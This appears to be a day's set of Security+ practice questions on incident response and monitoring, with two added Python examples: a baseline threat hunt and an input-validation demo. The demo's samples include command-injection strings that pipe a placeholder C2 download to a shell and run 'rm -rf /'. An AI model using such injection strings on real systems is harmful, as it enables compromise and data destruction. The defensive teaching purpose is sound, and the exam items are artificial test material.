Cohort 9 Day 7


A company wants to verify that the software the company is deploying came from the vendor the company purchased the software from. Which of the following is the best way for the company to confirm this information?
A. Validate the code signature.
B. Execute the code in a sandbox.
C. Search the executable for ASCII strings.
D. Generate a hash of the files.

A security analyst is investigating an application server and discovers that software on the server is
behaving abnormally. The software normally runs batch jobs locally and does not generate traffic,
but the process is now generating outbound traffic over random high ports. Which of the following
vulnerabilities has likely been exploited in this software?
A. Memory injection
B. Race condition
C. Side loading
D. SQL injection

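
The indicator in this question is a behavioural deviation: a process that should never talk to the network starts making outbound connections on random high ports, which is what injected code running inside a trusted process looks like from the outside. Added example, not from the page: a small Python hunt over constructed endpoint connection events that flags processes acting outside an assumed per-process baseline, the kind of ad hoc query an analyst writes when, as in the later threat-hunting question, no SIEM alert exists yet. The event format, the process names and the baseline table are all assumptions; public destinations use the 203.0.113.0/24 documentation range.

```python
"""Baseline-deviation hunt over constructed connection events (added example)."""
import ipaddress

# Constructed sample events, not real telemetry.
# Fields: timestamp, process image, direction, destination IP, destination port
SAMPLE_EVENTS = [
    "2024-05-01T02:00:01Z batchrunner.exe out 10.20.30.40 445",
    "2024-05-01T02:00:07Z batchrunner.exe out 203.0.113.17 49213",
    "2024-05-01T02:00:09Z batchrunner.exe out 203.0.113.17 58844",
    "2024-05-01T02:00:10Z chrome.exe out 203.0.113.80 443",
    "2024-05-01T02:00:12Z svchost.exe out 10.20.30.1 53",
]

# Assumed per-process baseline: destination ports each process is expected to use.
# A process absent from the table is expected to generate no network traffic at all.
BASELINE = {"chrome.exe": {80, 443}, "svchost.exe": {53, 123}}

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
EPHEMERAL_START = 49152   # IANA dynamic/private port range


def is_internal(ip):
    """RFC 1918 check done by hand: ipaddress.is_private also covers the
    documentation ranges used in the sample data, which would hide them."""
    return any(ip in net for net in RFC1918)


def parse(line):
    ts, image, direction, ip, port = line.split()
    return {"ts": ts, "image": image, "direction": direction,
            "ip": ipaddress.ip_address(ip), "port": int(port)}


def hunt(lines):
    """Return one finding per outbound connection that the baseline does not explain."""
    findings = []
    for line in lines:
        ev = parse(line)
        if ev["direction"] != "out":
            continue
        allowed = BASELINE.get(ev["image"])
        if allowed is not None and ev["port"] in allowed:
            continue                                  # expected behaviour
        reason = ("process has no expected network activity" if allowed is None
                  else "port %d not in baseline" % ev["port"])
        # External destination on an ephemeral port is the pattern in the question
        c2_like = not is_internal(ev["ip"]) and ev["port"] >= EPHEMERAL_START
        findings.append({"ts": ev["ts"], "image": ev["image"],
                         "dst": "%s:%d" % (ev["ip"], ev["port"]),
                         "reason": reason,
                         "severity": "high" if c2_like else "medium"})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f)
```

Only the batch runner is reported: the internal SMB connection as a medium-severity baseline deviation, the two connections to an external host on ephemeral ports as high. The next step the question implies is pulling the process's memory and loaded modules from the endpoint, since the on-disk binary is probably unchanged.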
An organization recently updated its security policy to include the following statement:
Regular expressions are included in source code to remove special characters such as $, |, ;, &, `, and
? from variables set by forms in a web application.
Which of the following best explains the security technique the organization adopted by making this
addition to the policy?
A. Identify embedded keys
B. Code debugging
C. Input validation
D. Static code analysis

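
Added example, not from the page: the policy's own technique (a regex that removes the listed shell metacharacters) next to the stricter form of input validation a reviewer would ask for, an allowlist that defines what a field may contain and rejects everything else. The field (a hostname passed to ping), the patterns and the function names are assumptions.

```python
"""Input validation: character removal (the policy's technique) beside an allowlist."""
import re

# The policy statement's approach: strip $ | ; & ` ? from form input.
STRIP_PATTERN = re.compile(r"[$|;&`?]")


def sanitize_by_removal(value):
    """Remove the listed special characters, as the policy describes (a denylist)."""
    return STRIP_PATTERN.sub("", value)


# Allowlist alternative: a hostname is letters, digits, dots and hyphens, not
# starting or ending with a hyphen or dot, at most 253 characters.
HOSTNAME_PATTERN = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?")


def is_valid_hostname(value):
    return HOSTNAME_PATTERN.fullmatch(value) is not None


def build_ping_command(host):
    """Argument vector for subprocess.run(..., shell=False). The host is a single
    argv element, so a metacharacter that slipped past sanitising would still
    never be parsed by a shell."""
    if not is_valid_hostname(host):
        raise ValueError("rejected hostname: %r" % host)
    return ["ping", "-c", "1", host]


if __name__ == "__main__":
    # Constructed inputs: a benign one and two attempts at command injection.
    for sample in ("example.com", "example.com; curl $C2 | sh", "example.com\nrm -rf /"):
        print(repr(sample), "->", repr(sanitize_by_removal(sample)),
              "valid:", is_valid_hostname(sample))
```

The third sample shows the weakness of removal alone: a newline is not on the policy's list, so it survives sanitising, yet it separates commands in most shells. The allowlist rejects it because it is simply not a hostname character, and passing the value as an argv element rather than a shell string removes the interpreter from the path entirely.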
A security manager created new documentation to use in response to various types of security
incidents. Which of the following is the next step the manager should take?
A. Set the maximum data retention policy.
B. Securely store the documents on an air-gapped network.
C. Review the documents' data classification policy.
D. Conduct a tabletop exercise with the team.

Which of the following is the phase in the incident response process when a security analyst reviews
roles and responsibilities?
A. Preparation
B. Recovery
C. Lessons learned
D. Analysis

Which of the following exercises should an organization use to improve its incident response
process?
A. Tabletop
B. Replication
C. Failover
D. Recovery

During a recent breach, employee credentials were compromised when a service desk employee
issued an MFA bypass code to an attacker who called and posed as an employee. Which of the
following should be used to prevent this type of incident in the future?
A. Hardware token MFA
B. Biometrics
C. Identity proofing
D. Least privilege

A cyber operations team informs a security analyst about a new tactic malicious actors are using to
compromise networks.
SIEM alerts have not yet been configured. Which of the following best describes what the security
analyst should do to identify this behavior?
A. Digital forensics
B. E-discovery
C. Incident response
D. Threat hunting

Which of the following describes the reason root cause analysis should be conducted as part of
incident response?
A. To gather IoCs for the investigation
B. To discover which systems have been affected
C. To eradicate any trace of malware on the network
D. To prevent future incidents of the same nature

A security administrator needs a method to secure data in an environment that includes some form
of checks so that the administrator can track any changes. Which of the following should the
administrator set up to achieve this goal?
A. SPF
B. GPO
C. NAC
D. FIM

Which of the following incident response activities ensures evidence is properly handled?
A. E-discovery
B. Chain of custody
C. Legal hold
D. Preservation

After a company was compromised, customers initiated a lawsuit. The company's attorneys have
requested that the security team initiate a legal hold in response to the lawsuit. Which of the
following describes the action the security team will most likely be required to take?
A. Retain the emails between the security team and affected customers for 30 days.
B. Retain any communications related to the security breach until further notice.
C. Retain any communications between security members during the breach response.
D. Retain all emails from the company to affected customers for an indefinite period of time.

An administrator assists the legal and compliance team with ensuring information about customer
transactions is archived for the proper time period. Which of the following data policies is the
administrator carrying out?
A. Compromise
B. Retention
C. Analysis
D. Transfer
E. Inventory

During an investigation, an incident response team attempts to understand the source of an incident.
Which of the following incident response activities describes this process?
A. Analysis
B. Lessons learned
C. Detection
D. Containment

After a recent ransomware attack on a company's system, an administrator reviewed the log files.
Which of the following control types did the administrator use?
A. Compensating
B. Detective
C. Preventive
D. Corrective

After an audit, an administrator discovers all users have access to confidential data on a file server.
Which of the following should the administrator use to restrict access to the data quickly?
A. Group Policy
B. Content filtering
C. Data loss prevention
D. Access control lists

A security analyst is reviewing alerts in the SIEM related to potential malicious network traffic
coming from an employee’s corporate laptop. The security analyst has determined that additional
data about the executable running on the machine is necessary to continue the investigation. Which
of the following logs should the analyst use as a data source?
A. Application
B. IPS/IDS
C. Network
D. Endpoint

A newly appointed board member with cybersecurity knowledge wants the board of directors to
receive a quarterly report detailing the number of incidents that impacted the organization. The
systems administrator is creating a way to present the data to the board of directors. Which of the
following should the systems administrator use?
A. Packet captures
B. Vulnerability scans
C. Metadata
D. Dashboard

Which of the following describes a security alerting and monitoring tool that collects system,
application, and network logs from multiple sources in a centralized system?
A. SIEM
B. DLP
C. IDS
D. SNMP

A security analyst locates a potentially malicious video file on a server and needs to identify both the
creation date and the file's creator. Which of the following actions would most likely give the security
analyst the information required?
A. Obtain the file's SHA-256 hash.
B. Use hexdump on the file's contents.
C. Check endpoint logs.
D. Query the file's metadata.

A Chief Information Security Officer wants to monitor the company's servers for SQLi attacks and
allow for comprehensive investigations if an attack occurs. The company uses SSL decryption to allow
traffic monitoring. Which of the following strategies would best accomplish this goal?
A. Logging all NetFlow traffic into a SIEM
B. Deploying network traffic sensors on the same subnet as the servers
C. Logging endpoint and OS-specific security logs
D. Enabling full packet capture for traffic entering and exiting the servers
